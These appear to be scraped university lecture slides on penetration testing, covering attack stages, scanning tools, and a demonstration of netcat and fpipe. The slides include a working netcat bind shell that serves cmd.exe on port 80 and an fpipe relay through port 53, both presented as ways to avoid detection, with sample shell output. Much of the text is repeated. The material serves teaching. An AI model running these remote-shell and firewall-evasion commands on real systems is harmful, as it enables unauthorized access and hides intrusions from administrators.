Definition, Concepts on Penetration Testing/Hacking

Download 457 b.

Sana	11.07.2017
Hajmi	457 b.
	#10960

Definition, Concepts on Penetration Testing/Hacking

Definition, Concepts on Penetration Testing/Hacking
Anatomy of a Hack
Framework for penetration studies
Skills and Requirements of a Penetration Tester
SAN list of Security Holes
Internet Penetration
Dial up Penetration
Internal Penetration
References:

CORE IMPACT - Penetration Testing: Assessing Your Overall Security Before Attackers Do
Pages 165,277 Security in Computing.
Hack I.T, Security Through Penetration Testing, by T.J. Klevinksy, Scott Laliberte, Ajay Gupta.
http://www.hackingexposed.com/win2k/links.html

Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.

Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.
Using the failure of the system to violate the site security policy is called exploiting the vulnerability
Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.
It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence.
Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects.
What is the difference between penetration testing and hacking/intrusion?

A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implementation.

A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implementation.
A simple list of vulnerabilities , although helpful in closing those specific holes, contribute far less to the security of a system.
In practice, constrains (resource, money, time) affect the penetration study

An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al.

An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al.

Information gathering. Sam Spade is window-based network query tool.

Information gathering. Sam Spade is window-based network query tool.
Find out target IP address/phone number range

Why check phone numbers?

Namespace acquisition. Network Topology (visualRoute).
It is essential to a “surgical” attack.
The key here is not to miss any details.
Note that for penetration tester, this step is to avoiding testing others instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of).
Defense: deploy NIDS (snort), RotoRouter

Bulk Target assessment

Bulk Target assessment
Which machine is up and what ports (services) are open
Focus on most promising avenues of entry.
To avoid being detect, these tools can reduce frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence.
Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example.

Identify valid user accounts or poorly protected resource shares.

Identify valid user accounts or poorly protected resource shares.
Most intrusive probing than scanning step.

Based on the information gathered so far, make an informed attempted to access the target.

Based on the information gathered so far, make an informed attempted to access the target.

If only user-level access was obtained in the last step, seek to gain complete control of the system.

If only user-level access was obtained in the last step, seek to gain complete control of the system.

Webster's Revised Unabridged Dictionary (1913)

Webster's Revised Unabridged Dictionary (1913)

Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.

Gather info on identify mechanisms to allow access of trusted systems.

Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.

Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.

Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.

Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.

If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

Originally designed by Renaud Deraison

Originally designed by Renaud Deraison
Available at www.nessus.org
Main scanning engine running on Unix server with client GUI running on Unix or Windows.
Pretty good control and reporting.
Include a script language for plug-in (detecting additional attacks).
http://www.nessus.org/pres/bh2001/index.html

Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)

Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)
Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall.
We will use netcat and fpipe to illustrate the concept.
Netcat is available at http://www.atstake.com/research/tools/network_utilities/
Fpipe is available at http://www.foundstone.com

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
Hacker runs the nc command on the victim machine, which listens to the command sent in from port 80, use cmd.exe to run the command and redirect the console output as http response back.
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
Here we bind in front of port 80. You can also use port 139. The idea is used known port to avoid detection.
-L is used to repeat previous command after connection is terminated.
The nc command will receive command from packet to port 80, and run it with cmd.exe and send back execution result.

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63 FPipe v2.1 - TCP/UDP port redirector.

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63 FPipe v2.1 - TCP/UDP port redirector.
This is run the infected machine which serves as relay. Use port 53 for listen to Internet connection, relay any msg from port 53 to machine with 128.198.177.63 and port 80.
http://www.foundstone.com
Pipe connected:
In: 128.198.162.60:58797 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection.

C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53

C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53
Trying 128.198.168.63...
Connected to vivian (128.198.168.63).
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
C:\work\cucs\cs522\project>dir
dir
Volume in drive C is S3A1203D501
Volume Serial Number is 503B-9F00
Directory of C:\work\cucs\cs522\project
04/29/2003 12:56 PM .
04/29/2003 12:56 PM ..
04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps
Note that it is the console output of 128.198.177.63 machine being shown here.

External attacker with no knowledge of the system.

External attacker with no knowledge of the system.
External attacker with access to the system.
Internal attacker with access to the system.

Download 457 b.

Do'stlaringiz bilan baham:

Definition, Concepts on Penetration Testing/Hacking

Definition, Concepts on Penetration Testing/Hacking

Definition, Concepts on Penetration Testing/Hacking

Anatomy of a Hack

Framework for penetration studies

Skills and Requirements of a Penetration Tester

SAN list of Security Holes

Internet Penetration

Dial up Penetration

Internal Penetration

References:

Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.

Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.

Using the failure of the system to violate the site security policy is called exploiting the vulnerability

Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.

Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.

Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.

It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence.

Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects.

What is the difference between penetration testing and hacking/intrusion?

A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implementation.

A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implementation.

A simple list of vulnerabilities , although helpful in closing those specific holes, contribute far less to the security of a system.

In practice, constrains (resource, money, time) affect the penetration study

An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al.

An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al.

Information gathering. Sam Spade is window-based network query tool.

Information gathering. Sam Spade is window-based network query tool.

Find out target IP address/phone number range

Namespace acquisition. Network Topology (visualRoute).

It is essential to a “surgical” attack.

The key here is not to miss any details.

Note that for penetration tester, this step is to avoiding testing others instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of).

Defense: deploy NIDS (snort), RotoRouter

Bulk Target assessment

Bulk Target assessment

Which machine is up and what ports (services) are open

Focus on most promising avenues of entry.

To avoid being detect, these tools can reduce frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence.

Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example.

Identify valid user accounts or poorly protected resource shares.

Identify valid user accounts or poorly protected resource shares.

Most intrusive probing than scanning step.

Based on the information gathered so far, make an informed attempted to access the target.

Based on the information gathered so far, make an informed attempted to access the target.

If only user-level access was obtained in the last step, seek to gain complete control of the system.

If only user-level access was obtained in the last step, seek to gain complete control of the system.

Webster's Revised Unabridged Dictionary (1913)

Webster's Revised Unabridged Dictionary (1913)

Gather info on identify mechanisms to allow access of trusted systems.

Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.

Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.

Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.

Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.

If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

Originally designed by Renaud Deraison

Originally designed by Renaud Deraison

Available at www.nessus.org

Main scanning engine running on Unix server with client GUI running on Unix or Windows.

Pretty good control and reporting.

Include a script language for plug-in (detecting additional attacks).

http://www.nessus.org/pres/bh2001/index.html

Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)

Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)

Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall.

We will use netcat and fpipe to illustrate the concept.

Netcat is available at http://www.atstake.com/research/tools/network_utilities/

Fpipe is available at http://www.foundstone.com

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63

Hacker runs the nc command on the victim machine, which listens to the command sent in from port 80, use cmd.exe to run the command and redirect the console output as http response back.

listening on [128.198.177.63] 80 ...

connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on [128.198.177.63] 80 ...

connect to [128.198.177.63] from VIVIAN.eas.uccs.edu

Here we bind in front of port 80. You can also use port 139. The idea is used known port to avoid detection.

-L is used to repeat previous command after connection is terminated.

The nc command will receive command from packet to port 80, and run it with cmd.exe and send back execution result.

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63 FPipe v2.1 - TCP/UDP port redirector.

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63 FPipe v2.1 - TCP/UDP port redirector.